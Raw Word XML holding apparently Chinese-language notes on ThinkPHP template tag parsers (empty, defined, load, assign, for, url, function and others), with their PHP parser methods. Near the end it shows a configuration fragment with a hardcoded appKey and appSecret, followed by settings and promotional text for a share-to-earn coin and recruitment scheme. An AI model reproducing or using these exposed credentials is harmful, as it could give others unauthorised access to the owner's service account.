    <w:p w14:paraId="39939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如果某个变量没有设置，则输出内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5B3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{notpresent name="" }content{/notpresent}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFF5A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053398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276ADE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49D712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5AEA42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FB7D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tagNotpresent($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FBBD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ABE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7EF74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6F6E11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if(!isset(' . $name . ')): ?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA3E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680222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0105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373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empty</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778412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如果某个变量为</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">empty </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>则输出内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C53B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{empty name="" }content{/empty}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497EAC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1BADF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7CCFE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4E970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132FB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307E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tagEmpty($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677830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DEED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6B3E8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58A6E0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if(empty(' . $name . ') || (' . $name . ' instanceof \think\Collection &amp;&amp; ' . $name . '-&gt;isEmpty())): ?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150BD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01FEB1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2DE5A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471D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notempty</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E35D2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如果某个变量不为</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">empty </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>则输出内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D2E2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{notempty name="" }content{/notempty}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52378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368A47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71E10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6036F1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36DDD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10DC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tagNotempty($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF5F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11D0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3D836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74F90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if(!(empty(' . $name . ') || (' . $name . ' instanceof \think\Collection &amp;&amp; ' . $name . '-&gt;isEmpty()))): ?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117CB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79925A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A3B9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04B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判断是否已经定义了该常量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D1DE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{defined name='TXT'}</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已定义</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{/defined}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584B99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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674EB0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CD8F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791556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A14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tagDefined($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F981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8D35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4943B0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if(defined("' . $name . '")): ?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C404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2EDC8A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B226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8492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判断是否没有定义了该常量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EF45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{notdefined name='TXT'}</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已定义</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{/notdefined}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545AC7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399EA6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165FCE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7474F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7878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tagNotdefined($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AA26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86D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$tag['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CED28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if(!defined("' . $name . '")): ?&gt;' . $content . '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013DAF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36813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AB4B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7891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load </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> {load file="/static/js/base.js" /}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60776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{load file="/static/css/base.css" /}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AFF7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59A49E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1B5743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7DCD3D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45B9C9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38728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tagLoad($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73241A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15B8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isset($tag['file']) ? $tag['file'] : $tag['href'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B44EA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isset($tag['type']) ? strtolower($tag['type']) : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD7CE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0CB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$endStr   = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5192B8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(isset($tag['value'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B4A6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$tag['value'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2160AE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$this-&gt;autoBuildVar($name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150449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'isset(' . $name . ')';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607932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if(' . $name . '): ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248D4D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$endStr = '&lt;?php endif; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEBF1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8E2B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 = explode(',', $file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2A5C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($array as $val) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0636F9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strtolower(substr(strrchr($val, '.'), 1));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06095D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($type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304BFC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'js':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3205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'&lt;script type="text/javascript" src="' . $val . '"&gt;&lt;/script&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101497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10AE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'css':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0C3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'&lt;link rel="stylesheet" type="text/css" href="' . $val . '" /&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61298E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25D51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'php':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21175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include "' . $val . '"; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1877E8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B1CB0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A493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AFF6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 . $endStr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039CDA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7E6A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BD25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assign</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5B67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在模板中给某个变量赋值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>支持变量赋值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9B3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{assign name="" value="" /}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0115B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386A6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64723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0D551D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155D07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F34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tagAssign($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D258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7F08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$this-&gt;autoBuildVar($tag['name']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486B01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substr($tag['value'], 0, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C242A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$flag || ':' == $flag) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22736C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$this-&gt;autoBuildVar($tag['value']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410B9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4FB7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 . $tag['value'] . '\'';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6F99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696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 . $name . ' = ' . $value . '; ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49197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70858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E9B2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3D28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define</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353D12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在模板中定义常量</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>支持变量赋值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030866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 xml:space="preserve"> {define name="" value="" /}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744F00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15E35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4CCBB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3F33C8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40906D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BD2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tagDefine($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EEA1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B458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 . $tag['name'] . '\'';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AD2D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substr($tag['value'], 0, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BE81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$flag || ':' == $flag) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8DC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$this-&gt;autoBuildVar($tag['value']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AF0E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4D623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 . $tag['value'] . '\'';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26289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F41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define(' . $name . ', ' . $value . '); ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172D99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4B72D7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CF4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320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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F609D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p>
    <w:p w14:paraId="3895A8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 start="" end="" comparison="" step="" name=""}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6068D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content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31752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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F8EF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471029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5219AE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3E3BC0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154291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D6B3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tagFor($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A68C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5DF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$start      = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4745B2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$end        = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CF4D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$step       = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E91C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$comparison = 'lt';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7800B2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD4DC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$rand       = rand(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1A8D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($tag as $key =&gt; $value) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C1E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trim($value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1539CB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  = substr($value, 0, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653CEF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 == $flag || ':' == $flag) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA9E9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$this-&gt;autoBuildVar($value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A655D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C26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($key) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FF17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'start':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792AFE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$start = $value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017782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0DE75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case 'end':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51556D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$end = $value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556326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7BF1C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'step':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B9E2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$step = $value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B33C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D085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'comparison':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633613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$comparison = $value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA008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26C9A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'name':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6DBA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$value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9EE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B3F6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5DF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0262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$__FOR_START_' . $rand . '__=' . $start . ';$__FOR_END_' . $rand . '__=' . $end . ';';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A895B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'for($' . $name . '=$__FOR_START_' . $rand . '__;' . $this-&gt;parseCondition('$' . $name . ' ' . $comparison . ' $__FOR_END_' . $rand . '__') . ';$' . $name . '+=' . $step . '){ ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32866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$content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A74F1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 ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2365F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1B06FD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3DE6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AF80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U</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数的</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE656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格式：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{url link="</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>模块</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>控制器</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>" vars="</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>" suffix="true</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">false </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否带有后缀</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>" domain="true</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">false </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否携带域名</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>" /}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018BF8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71C011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7064DD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68A233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31A61D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D383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tagUrl($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69629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4793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isset($tag['link']) ? $tag['link'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EBA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$vars   = isset($tag['vars']) ? $tag['vars'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC42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$suffix = isset($tag['suffix']) ? $tag['suffix'] : 'true';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB3CB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isset($tag['domain']) ? $tag['domain'] : 'false';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9359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'&lt;?php echo url("' . $url . '","' . $vars . '",' . $suffix . ',' . $domain . ');?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D2CA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AEA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E4F2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function</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签解析</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>匿名函数，可实现递归</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4973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使用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCF8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{function name="func" vars="$data" call="$list" use="&amp;$a,&amp;$b"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C753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{if is_array($data)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE616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{foreach $data as $val}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFC9C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{~func($val) /}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C11B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{/foreach}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DECE1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39D83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{$data}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCC9B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{/if}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006DD1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{/function}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100DE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@access public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0125FE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array $tag </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A9ED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string $content </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770A9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string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9BFF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B4C4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tagFunction($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E0EB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AC27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!empty($tag['name']) ? $tag['name'] : 'func';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7761D1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$vars = !empty($tag['vars']) ? $tag['vars'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBC1B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$call = !empty($tag['call']) ? $tag['call'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1188C9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  = ['&amp;$' . $name];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AE36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(!empty($tag['use'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01693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(explode(',', $tag['use']) as $val) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA76E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 = '&amp;' . ltrim(trim($val), '&amp;');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E41D6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D972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02BD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'&lt;?php $' . $name . '=function(' . $vars . ') use(' . implode(',', $use) . ') {';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3D11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 ?&gt;' . $content . '&lt;?php }; ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DB0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$parseStr .= $call ? '$' . $name . '(' . $call . '); ?&gt;' : '?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414355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$parseStr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3D8B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104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57F51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053E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3D3DAA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'10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AFBE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=&gt; '0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E301C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 =&gt; '1',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CC9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0E1B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3DBEDD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'appKey' =&gt; '4z3hlwrv4ovvt',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4D60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'appSecret' =&gt; 'BU6RSKLnJVN',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596B66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'jsonPath' =&gt; 'jsonsource/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083B01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ABAE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50272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                =&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081CF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'baoxiang_l'              =&gt;  '1',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2CD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'baoxiang_r'              =&gt;  '5',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620A2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'baoxiang_fenxiang'</w:t>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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分享到朋友圈不仅可以获得</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;span&gt;20</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/span&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，还可以获得现金，现在每收一个有效徒弟最低可赚</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
